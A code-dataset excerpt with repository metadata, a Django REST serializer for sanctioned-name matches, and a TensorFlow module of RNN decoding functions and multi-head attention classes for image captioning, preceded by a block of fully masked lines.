XX XXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XX XXXXXXX X XXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XX XXXXXXXX XXXXXXXXXX XXXXXXXXXXXXXXX XXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXX XXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXX
XXXXXX
XXXX XXXXXXXXXXXX
XXXX XXXXXXXXXXXXXXXX
XXX
XX XXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX XXXXXX XXXXXX XX XXXXXXXXXXX XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX XXXXXXXXX
XXXXXXX XX XXXXXXXXXX XXXXX XXXXX
XXXX
XXXXXX
XXXXXX
XXXXXXX
XXXXXXX
| [
"[email protected]"
] | |
cec1ac5c978a20fda316ddf1475bffc7cc5c0a85 | b91578b96ffe63639d3efc70d4737b92091cd0b1 | /backend/unpp_api/apps/sanctionslist/serializers.py | 3d57ed5f866b73fbe8dde2953857e5e283fedb35 | [
"Apache-2.0"
] | permissive | unicef/un-partner-portal | 876b6ec394909ed2f72777493623413e9cecbfdc | 73afa193a5f6d626928cae0025c72a17f0ef8f61 | refs/heads/develop | 2023-02-06T21:08:22.037975 | 2019-05-20T07:35:29 | 2019-05-20T07:35:29 | 96,332,233 | 6 | 1 | Apache-2.0 | 2023-01-25T23:21:41 | 2017-07-05T15:07:44 | JavaScript | UTF-8 | Python | false | false | 633 | py | from rest_framework import serializers
from sanctionslist.models import SanctionedNameMatch
class SanctionedNameMatchSerializer(serializers.ModelSerializer):
sanctioned_type = serializers.CharField(source='name.item.sanctioned_type', read_only=True)
sanctioned_type_display = serializers.CharField(source='name.item.get_sanctioned_type_display', read_only=True)
match_type_display = serializers.CharField(source='get_match_type_display', read_only=True)
class Meta:
model = SanctionedNameMatch
exclude = (
'partner',
'can_ignore',
'can_ignore_text',
)
| [
"[email protected]"
] | |
699217857bdbf1f709123b843e8bbc301dfeee0a | a859aadea24af173a175c2d01910314487ec6fbf | /common/ops_rnn_v2.py | acd3ae1ce052c94ce4a70df353ea57d9d33f42f4 | [
"BSD-3-Clause"
] | permissive | jiahuei/tf-sparse-captioning | cc52cbef5590b47727ea89f265011c9ab58aebad | 9d7b8ecdd44fb1541500ca4f920d6c94fd15bad1 | refs/heads/main | 2023-04-07T05:27:28.395758 | 2021-04-19T11:27:28 | 2021-04-19T11:27:28 | 359,341,665 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 34,951 | py | #!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 27 16:22:42 2017
@author: jiahuei
"""
# import numpy as np
import logging
import tensorflow as tf
# from tensorflow.python.framework import ops
# from tensorflow.python.ops import rnn_cell_impl
from tensorflow.contrib.seq2seq.python.ops.beam_search_decoder import _check_batch_beam, gather_tree_from_array
from tensorflow.contrib.seq2seq.python.ops import attention_wrapper
from tensorflow.python.layers.core import Dense
# from tensorflow.python.layers import base
# from tensorflow.python.framework import dtypes
# from common.mask_prune import sampler
from common.mask_prune import masked_layer
from common.ops_v1 import layer_norm_activate, dprint
from common.ops_v1 import shape as _shape
# from packaging import version
AttentionWrapperState = tf.contrib.seq2seq.AttentionWrapperState
logger = logging.getLogger(__name__)
_DEBUG = False
def _dprint(string):
return dprint(string, _DEBUG)
def _layer_norm_tanh(tensor):
# if version.parse(tf.__version__) >= version.parse('1.9'):
try:
tensor = layer_norm_activate(
'LN_tanh',
tensor,
tf.nn.tanh,
begin_norm_axis=-1)
except TypeError:
tensor_s = _shape(tensor)
tensor = layer_norm_activate(
'LN_tanh',
tf.reshape(tensor, [-1, tensor_s[-1]]),
tf.nn.tanh)
tensor = tf.reshape(tensor, tensor_s)
return tensor
###############################################################################
def rnn_decoder_beam_search(cell,
embedding_fn,
output_layer,
batch_size,
beam_size,
length_penalty_weight,
maximum_iterations,
start_id,
end_id,
swap_memory=True):
"""
Dynamic RNN loop function for inference. Performs beam search.
Operates in time-major mode.
Args:
cell: An `RNNCell` instance (with or without attention).
embedding_fn: Either embedding Variable or embedding function.
output_layer: An instance of `tf.layers.Layer`, i.e.,
`tf.layers.Dense`. Layer to apply to the RNN output prior to
storing the result or sampling. Pass `None` to disable it.
batch_size: Int scalar. Size of batch.
beam_size: `Int scalar. Size of beam for beam search.
length_penalty_weight: Float weight to penalise length.
Disabled with 0.0.
maximum_iterations: Int scalar. Maximum number of decoding steps.
start_id: `int32` scalar, the token that marks start of decoding.
end_id: `int32` scalar, the token that marks end of decoding.
swap_memory: Python bool, whether GPU-CPU memory swap is enabled.
Argument passed to `tf.while_loop`.
Returns:
top_sequence, top_score, None
"""
logger.debug('Building subgraph V4 for Beam Search.')
state_init = cell.zero_state(batch_size * beam_size, tf.float32)
start_ids = tf.tile([start_id], multiples=[batch_size])
_dprint('rnn_decoder_beam_search: Initial state: {}'.format(state_init))
_dprint('rnn_decoder_beam_search: Cell state size: {}'.format(cell.state_size))
# decoder = tf.contrib.seq2seq.BeamSearchDecoder(
decoder = BeamSearchDecoderMultiHead(
cell=cell,
embedding=embedding_fn,
start_tokens=start_ids,
end_token=end_id,
initial_state=state_init,
beam_width=beam_size,
output_layer=output_layer,
length_penalty_weight=length_penalty_weight,
reorder_tensor_arrays=True) # r1.9 API
dec_outputs, dec_states, _ = tf.contrib.seq2seq.dynamic_decode(
decoder=decoder,
output_time_major=True,
impute_finished=False,
maximum_iterations=maximum_iterations,
parallel_iterations=1,
swap_memory=swap_memory)
_dprint('rnn_decoder_beam_search: Final BeamSearchDecoderState: {}'.format(dec_states))
# `dec_outputs` will be a `FinalBeamSearchDecoderOutput` object
# `dec_states` will be a `BeamSearchDecoderState` object
predicted_ids = dec_outputs.predicted_ids # (time, batch_size, beam_size)
scores = dec_outputs.beam_search_decoder_output.scores # (time, batch_size, beam_size)
# top_sequence = predicted_ids[:, :, 0]
# top_score = scores[:, :, 0] # log-softmax scores
return predicted_ids, scores, dec_states.cell_state
def rnn_decoder_search(cell,
embedding_fn,
output_layer,
batch_size,
maximum_iterations,
start_id,
end_id,
swap_memory=True,
greedy_search=True):
"""
Dynamic RNN loop function for inference. Performs greedy search / sampling.
Operates in time-major mode.
Args:
cell: An `RNNCell` instance (with or without attention).
embedding_fn: A callable that takes a vector tensor of `ids`
(argmax ids), or the `params` argument for `embedding_lookup`.
The returned tensor will be passed to the decoder input.
output_layer: An instance of `tf.layers.Layer`, i.e.,
`tf.layers.Dense`. Layer to apply to the RNN output prior to
storing the result or sampling. Pass `None` to disable it.
batch_size: Int scalar. Size of batch.
maximum_iterations: Int scalar. Maximum number of decoding steps.
start_id: `int32` scalar, the token that marks start of decoding.
end_id: `int32` scalar, the token that marks end of decoding.
swap_memory: Python bool, whether GPU-CPU memory swap is enabled.
Argument passed to `tf.while_loop`.
greedy_search: Python bool, use argmax if True, sample from
distribution if False.
Returns:
output_ids, rnn_outputs, decoder_state
"""
# Initialise `AttentionWrapperState` with provided RNN state
state_init = cell.zero_state(batch_size, tf.float32)
start_ids = tf.tile([start_id], multiples=[batch_size])
_dprint('rnn_decoder_search: Initial state: {}'.format(state_init))
_dprint('rnn_decoder_search: Cell state size: {}'.format(cell.state_size))
if greedy_search:
logger.debug('Building subgraph V4 for Greedy Search.')
helper_fn = tf.contrib.seq2seq.GreedyEmbeddingHelper
else:
logger.debug('Building subgraph V4 for Sample Search.')
helper_fn = tf.contrib.seq2seq.SampleEmbeddingHelper
helper = helper_fn(
embedding=embedding_fn,
start_tokens=start_ids,
end_token=end_id)
decoder = tf.contrib.seq2seq.BasicDecoder(
cell=cell,
helper=helper,
initial_state=state_init,
output_layer=output_layer)
dec_outputs, dec_states, _ = tf.contrib.seq2seq.dynamic_decode(
decoder=decoder,
output_time_major=True,
impute_finished=False,
maximum_iterations=maximum_iterations,
parallel_iterations=1,
swap_memory=swap_memory)
# `dec_outputs` will be a `BasicDecoderOutput` object
# `dec_states` may be a `AttentionWrapperState` object
rnn_out = dec_outputs.rnn_output
output_ids = dec_outputs.sample_id
return output_ids, rnn_out, dec_states
def rnn_decoder_training(cell,
embeddings,
output_layer,
batch_size,
sequence_length,
swap_memory=True):
"""
Dynamic RNN loop function for training. Operates in time-major mode.
The decoder will run until <EOS> token is encountered.
Args:
cell: An `RNNCell` instance (with or without attention).
embeddings: A float32 tensor of shape [time, batch, word_size].
output_layer: An instance of `tf.layers.Layer`, i.e.,
`tf.layers.Dense`. Layer to apply to the RNN output prior to
storing the result or sampling. Pass `None` to disable it.
batch_size: Int scalar. Size of batch.
sequence_length: An int32 vector tensor. Length of sequence.
swap_memory: Python bool, whether GPU-CPU memory swap is enabled.
Argument passed to `tf.while_loop`.
Returns:
output_ids, rnn_outputs, decoder_state
"""
logger.debug('Building dynamic decode subgraph V4 for training.')
# Initialise `AttentionWrapperState` with provided RNN state
# batch_size = tf.shape(embeddings)[1]
state_init = cell.zero_state(batch_size, tf.float32)
_dprint('rnn_decoder_training: Initial state: {}'.format(state_init))
_dprint('rnn_decoder_training: Cell state size: {}'.format(cell.state_size))
helper = tf.contrib.seq2seq.TrainingHelper(
inputs=embeddings,
sequence_length=sequence_length,
time_major=True)
decoder = tf.contrib.seq2seq.BasicDecoder(
cell=cell,
helper=helper,
initial_state=state_init,
output_layer=output_layer)
dec_outputs, dec_states, _ = tf.contrib.seq2seq.dynamic_decode(
decoder=decoder,
output_time_major=True,
impute_finished=True,
maximum_iterations=None,
parallel_iterations=1,
swap_memory=swap_memory)
# `dec_outputs` will be a `BasicDecoderOutput` object
# `dec_states` may be a `AttentionWrapperState` object
rnn_out = dec_outputs.rnn_output
output_ids = dec_outputs.sample_id
# Perform padding by copying elements from the last time step.
# This is required if `impute_finished` is True.
# This is skipped in inference mode.
pad_time = tf.shape(embeddings)[0] - tf.shape(rnn_out)[0]
pad = tf.tile(rnn_out[-1:, :, :], [pad_time, 1, 1])
rnn_out = tf.concat([rnn_out, pad], axis=0) # (max_time, batch_size, rnn_size)
pad_ids = tf.tile(output_ids[-1:, :], [pad_time, 1])
output_ids = tf.concat([output_ids, pad_ids], axis=0) # (max_time, batch_size)
return output_ids, rnn_out, dec_states
def split_heads(x, num_heads):
"""Split channels (dimension 3) into multiple heads (becomes dimension 1).
Args:
x: a Tensor with shape [batch, length, channels]
num_heads: an integer
Returns:
a Tensor with shape [batch, num_heads, length, channels / num_heads]
"""
old_shape = _shape(x)
last = old_shape[-1]
new_shape = old_shape[:-1] + [num_heads] + [last // num_heads if last else -1]
# new_shape = tf.concat([old_shape[:-1], [num_heads, last // num_heads]], 0)
return tf.transpose(tf.reshape(x, new_shape, 'split_head'), [0, 2, 1, 3])
def combine_heads(x):
"""Inverse of split_heads.
Args:
x: a Tensor with shape [batch, num_heads, length, channels / num_heads]
Returns:
a Tensor with shape [batch, length, channels]
"""
x = tf.transpose(x, [0, 2, 1, 3])
old_shape = _shape(x)
a, b = old_shape[-2:]
new_shape = old_shape[:-2] + [a * b if a and b else -1]
# l = old_shape[2]
# c = old_shape[3]
# new_shape = tf.concat([old_shape[:-2] + [l * c]], 0)
return tf.reshape(x, new_shape, 'combine_head')
###############################################################################
# noinspection PyProtectedMember
class MultiHeadAttV3(attention_wrapper._BaseAttentionMechanism):
"""
Implements multi-head attention.
"""
# TODO: bookmark
# noinspection PyCallingNonCallable
def __init__(self,
num_units,
feature_map,
fm_projection,
num_heads=None,
scale=True,
memory_sequence_length=None,
probability_fn=tf.nn.softmax,
mask_type=None,
mask_init_value=0,
mask_bern_sample=False,
name='MultiHeadAttV3'):
"""
Construct the AttentionMechanism mechanism.
Args:
num_units: The depth of the attention mechanism.
feature_map: The feature map / memory to query. This tensor
should be shaped `[batch_size, height * width, channels]`.
fm_projection: Feature map projection mode.
num_heads: Int, number of attention heads. (optional)
scale: Python boolean. Whether to scale the energy term.
memory_sequence_length: Tensor indicating sequence length.
probability_fn: (optional) A `callable`. Converts the score
to probabilities. The default is `tf.nn.softmax`.
name: Name to use when creating ops.
"""
logger.debug('Using MultiHeadAttV3.')
assert fm_projection in [None, 'independent', 'tied']
# if memory_sequence_length is not None:
# assert len(_shape(memory_sequence_length)) == 2, \
# '`memory_sequence_length` must be a rank-2 tensor, ' \
# 'shaped [batch_size, num_heads].'
if mask_type is None:
self._dense_layer = Dense
self._mask_params = {}
else:
self._dense_layer = masked_layer.MaskedDense
self._mask_params = dict(mask_type=mask_type,
mask_init_value=mask_init_value,
mask_bern_sample=mask_bern_sample)
super(MultiHeadAttV3, self).__init__(
query_layer=self._dense_layer(units=num_units, name='query_layer', use_bias=False, **self._mask_params),
# query is projected hidden state
memory_layer=self._dense_layer(units=num_units, name='memory_layer', use_bias=False, **self._mask_params),
# self._keys is projected feature_map
memory=feature_map, # self._values is feature_map
probability_fn=lambda score, _: probability_fn(score),
memory_sequence_length=None,
score_mask_value=float('-inf'),
name=name)
self._probability_fn = lambda score, _: (
probability_fn(
self._maybe_mask_score_multi(
score, memory_sequence_length, float('-inf'))))
self._fm_projection = fm_projection
self._num_units = num_units
self._num_heads = num_heads
self._scale = scale
self._feature_map_shape = _shape(feature_map)
self._name = name
if fm_projection == 'tied':
assert num_units % num_heads == 0, \
'For `tied` projection, attention size/depth must be ' \
'divisible by the number of attention heads.'
self._values_split = split_heads(self._keys, self._num_heads)
elif fm_projection == 'independent':
assert num_units % num_heads == 0, \
'For `untied` projection, attention size/depth must be ' \
'divisible by the number of attention heads.'
# Project and split memory
v_layer = self._dense_layer(units=num_units, name='value_layer', use_bias=False, **self._mask_params)
# (batch_size, num_heads, mem_size, num_units / num_heads)
self._values_split = split_heads(v_layer(self._values), self._num_heads)
else:
assert _shape(self._values)[-1] % num_heads == 0, \
'For `none` projection, feature map channel dim size must ' \
'be divisible by the number of attention heads.'
self._values_split = split_heads(self._values, self._num_heads)
_dprint('{}: FM projection type: {}'.format(
self.__class__.__name__, fm_projection))
_dprint('{}: Splitted values shape: {}'.format(
self.__class__.__name__, _shape(self._values_split)))
_dprint('{}: Values shape: {}'.format(
self.__class__.__name__, _shape(self._values)))
_dprint('{}: Keys shape: {}'.format(
self.__class__.__name__, _shape(self._keys)))
_dprint('{}: Feature map shape: {}'.format(
self.__class__.__name__, _shape(feature_map)))
@property
def values_split(self):
return self._values_split
def initial_alignments(self, batch_size, dtype):
"""Creates the initial alignment values for the `AttentionWrapper` class.
This is important for AttentionMechanisms that use the previous alignment
to calculate the alignment at the next time step (e.g. monotonic attention).
The default behavior is to return a tensor of all zeros.
Args:
batch_size: `int32` scalar, the batch_size.
dtype: The `dtype`.
Returns:
A `dtype` tensor shaped `[batch_size, alignments_size]`
(`alignments_size` is the values' `max_time`).
"""
del batch_size
s = _shape(self.values_split)[:-1]
init = tf.zeros(shape=[s[0], s[1] * s[2]], dtype=dtype)
_dprint('{}: Initial alignments shape: {}'.format(self.__class__.__name__, _shape(init)))
return init
def _maybe_mask_score_multi(self,
score,
memory_sequence_length,
score_mask_value):
if memory_sequence_length is None:
return score
message = 'All values in memory_sequence_length must greater than zero.'
with tf.control_dependencies(
[tf.assert_positive(memory_sequence_length, message=message)]):
print(_shape(score))
score_mask = tf.sequence_mask(
memory_sequence_length, maxlen=tf.shape(score)[2])
score_mask_values = score_mask_value * tf.ones_like(score)
masked_score = tf.where(score_mask, score, score_mask_values)
_dprint('{}: score shape: {}'.format(
self.__class__.__name__, _shape(score)))
_dprint('{}: masked_score shape: {}'.format(
self.__class__.__name__, _shape(masked_score)))
return masked_score
class MultiHeadAddLN(MultiHeadAttV3):
"""
Implements Toronto-style (Xu et al.) attention scoring with layer norm,
as described in:
"Show, Attend and Tell: Neural Image Caption Generation with
Visual Attention." ICML 2015. https://arxiv.org/abs/1502.03044
"""
def __call__(self, query, state):
"""
Score the query based on the keys and values.
Args:
query: RNN hidden state. Tensor of shape `[batch_size, num_units]`.
state: IGNORED. Previous alignment values.
(`alignments_size` is memory's `max_time`).
Returns:
alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
del state
with tf.variable_scope(None, 'multi_add_attention', [query]):
# Reshape from [batch_size, ...] to [batch_size, 1, ...] for broadcasting.
proj_query = tf.expand_dims(self.query_layer(query), 1)
v = tf.get_variable(
'attention_v', [self._num_units], dtype=proj_query.dtype)
if len(self._mask_params) > 0:
v, _ = masked_layer.generate_masks(kernel=v, bias=None,
dtype=proj_query.dtype,
**self._mask_params)
score = self._keys + proj_query
score = _layer_norm_tanh(score)
score = tf.multiply(score, v)
score = split_heads(score, self._num_heads) # (batch_size, num_heads, mem_size, num_units / num_heads)
score = tf.reduce_sum(score, axis=3) # (batch_size, num_heads, mem_size)
if self._scale:
softmax_temperature = tf.get_variable(
'softmax_temperature',
shape=[],
dtype=tf.float32,
initializer=tf.constant_initializer(5.0),
collections=[tf.GraphKeys.GLOBAL_VARIABLES,
'softmax_temperatures'])
score = tf.truediv(score, softmax_temperature)
alignments = self._probability_fn(score, None)
next_state = alignments
_dprint('{}: Alignments shape: {}'.format(
self.__class__.__name__, _shape(alignments)))
return alignments, next_state
class MultiHeadAdd(MultiHeadAttV3):
"""
Implements Toronto-style (Xu et al.) attention scoring,
as described in:
"Show, Attend and Tell: Neural Image Caption Generation with
Visual Attention." ICML 2015. https://arxiv.org/abs/1502.03044
"""
def __call__(self, query, state):
"""
Score the query based on the keys and values.
Args:
query: RNN hidden state. Tensor of shape `[batch_size, num_units]`.
state: IGNORED. Previous alignment values.
(`alignments_size` is memory's `max_time`).
Returns:
alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
del state
with tf.variable_scope(None, 'MultiHeadAdd', [query]):
# Reshape from [batch_size, ...] to [batch_size, 1, ...] for broadcasting.
proj_query = tf.expand_dims(self.query_layer(query), 1)
v = tf.get_variable(
'attention_v', [self._num_units], dtype=proj_query.dtype)
if len(self._mask_params) > 0:
v, _ = masked_layer.generate_masks(kernel=v,
bias=None,
dtype=proj_query.dtype,
**self._mask_params)
score = self._keys + proj_query
score = tf.nn.tanh(score)
score = tf.multiply(score, v)
score = split_heads(score, self._num_heads) # (batch_size, num_heads, mem_size, num_units / num_heads)
score = tf.reduce_sum(score, axis=3) # (batch_size, num_heads, mem_size)
alignments = self._probability_fn(score, None)
next_state = alignments
_dprint('{}: Alignments shape: {}'.format(
self.__class__.__name__, _shape(alignments)))
return alignments, next_state
class MultiHeadDot(MultiHeadAttV3):
"""
Implements scaled dot-product scoring,
as described in:
"Attention is all you need." NIPS 2017.
https://papers.nips.cc/paper/7181-attention-is-all-you-need.pdf
"""
def __call__(self, query, state):
"""
Score the query based on the keys and values.
Args:
query: RNN hidden state. Tensor of shape `[batch_size, num_units]`.
state: IGNORED. Previous alignment values.
(`alignments_size` is memory's `max_time`).
Returns:
alignments: Tensor of dtype matching `self.values` and shape
`[batch_size, alignments_size]` (`alignments_size` is memory's
`max_time`).
"""
del state
with tf.variable_scope(None, 'MultiHeadDot', [query]):
# Reshape from [batch_size, ...] to [batch_size, 1, ...] for broadcasting.
proj_query = tf.expand_dims(self.query_layer(query), 1) # (batch_size, 1, num_units)
score = tf.multiply(self._keys, proj_query)
score = split_heads(score, self._num_heads) # (batch_size, num_heads, mem_size, num_units / num_heads)
score = tf.reduce_sum(score, axis=3) # (batch_size, num_heads, mem_size)
score /= tf.sqrt(self._num_units / self._num_heads)
alignments = self._probability_fn(score, None)
next_state = alignments
_dprint('{}: Alignments shape: {}'.format(
self.__class__.__name__, _shape(alignments)))
return alignments, next_state
# noinspection PyProtectedMember
class MultiHeadAttentionWrapperV3(attention_wrapper.AttentionWrapper):
"""
Wraps another `RNNCell` with attention, similar to `AttentionWrapper`.
Allows optional multi-head attention.
Logits projection should be performed at the decoder by passing in
an instance of `tf.layers.Layer`, as argument for `output_layer`.
